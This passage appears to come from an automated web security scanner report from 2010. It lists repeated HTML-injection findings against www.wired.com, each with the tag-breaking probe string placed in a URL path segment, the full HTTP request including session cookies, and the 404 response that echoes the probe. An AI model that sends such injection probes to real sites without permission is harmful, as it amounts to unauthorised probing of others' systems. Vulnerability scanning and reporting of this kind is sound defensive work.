...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7dad"><a>bdaa03d0efd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/newsb7dad"><a>bdaa03d0efd/2007/04/dayintech_0408 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_newsb7dad"><a>bdaa03d0efd">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45d4a"><a>db634723549 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science45d4a"><a>db634723549/discoveries/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:05 GMT
Date: Sun, 21 Nov 2010 23:10:05 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science45d4a"><a>db634723549 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 52754"><a>779fdc29594 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries52754"><a>779fdc29594/news/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:34 GMT
Date: Sun, 21 Nov 2010 23:10:34 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries52754"><a>779fdc29594 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c53d"><a>70481f04aba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news1c53d"><a>70481f04aba/2007/04/dayintech_0411 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news1c53d"><a>70481f04aba">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2f61"><a>cb8010c293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee2f61"><a>cb8010c293b/discoveries/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:51 GMT
Date: Sun, 21 Nov 2010 23:09:51 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2f61"><a>cb8010c293b ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76756"><a>179b35b8b9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries76756"><a>179b35b8b9f/news/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:21 GMT
Date: Sun, 21 Nov 2010 23:10:21 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries76756"><a>179b35b8b9f c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e6c7"><a>f3b3a70bcbe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news7e6c7"><a>f3b3a70bcbe/2007/04/dayintech_0426 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:37 GMT
Date: Sun, 21 Nov 2010 23:10:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news7e6c7"><a>f3b3a70bcbe">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78e8c"><a>82286881d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science78e8c"><a>82286881d2/discoveries/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:19:40 GMT
Date: Sun, 21 Nov 2010 23:09:40 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science78e8c"><a>82286881d2 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82709"><a>31e9f734c89 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries82709"><a>31e9f734c89/news/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:08 GMT
Date: Sun, 21 Nov 2010 23:10:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries82709"><a>31e9f734c89 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59461"><a>c9541460a9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news59461"><a>c9541460a9/2007/04/dayintech_0427 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:27 GMT
Date: Sun, 21 Nov 2010 23:10:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59461"><a>c9541460a9">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2efb"><a>fefb1eda5ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /sciencee2efb"><a>fefb1eda5ce/discoveries/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:15 GMT
Date: Sun, 21 Nov 2010 23:10:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_sciencee2efb"><a>fefb1eda5ce ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60a82"><a>54e3f66b7a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries60a82"><a>54e3f66b7a/news/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:39 GMT
Date: Sun, 21 Nov 2010 23:10:39 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries60a82"><a>54e3f66b7a c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91895"><a>1c7fed98e1a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news91895"><a>1c7fed98e1a/2007/05/dayintech_0503 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:54 GMT
Date: Sun, 21 Nov 2010 23:10:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news91895"><a>1c7fed98e1a">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95176"><a>ea0344b1c10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science95176"><a>ea0344b1c10/discoveries/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:45 GMT
Date: Sun, 21 Nov 2010 23:10:45 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science95176"><a>ea0344b1c10 ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d23ae"><a>0f5c0610fda was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesd23ae"><a>0f5c0610fda/news/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:06 GMT
Date: Sun, 21 Nov 2010 23:11:06 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveriesd23ae"><a>0f5c0610fda c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30df0"><a>9cafe32651a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news30df0"><a>9cafe32651a/2007/05/dayintech_0515 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:21:20 GMT
Date: Sun, 21 Nov 2010 23:11:20 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_science ss_discoveries c_news30df0"><a>9cafe32651a"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca5ec"><a>c25249c30fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /scienceca5ec"><a>c25249c30fc/discoveries/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:20:22 GMT
Date: Sun, 21 Nov 2010 23:10:22 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_scienceca5ec"><a>c25249c30fc ss_discoveries c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0442"><a>9e37c4acab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriese0442"><a>9e37c4acab2/news/2007/05/dayintech_0524 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
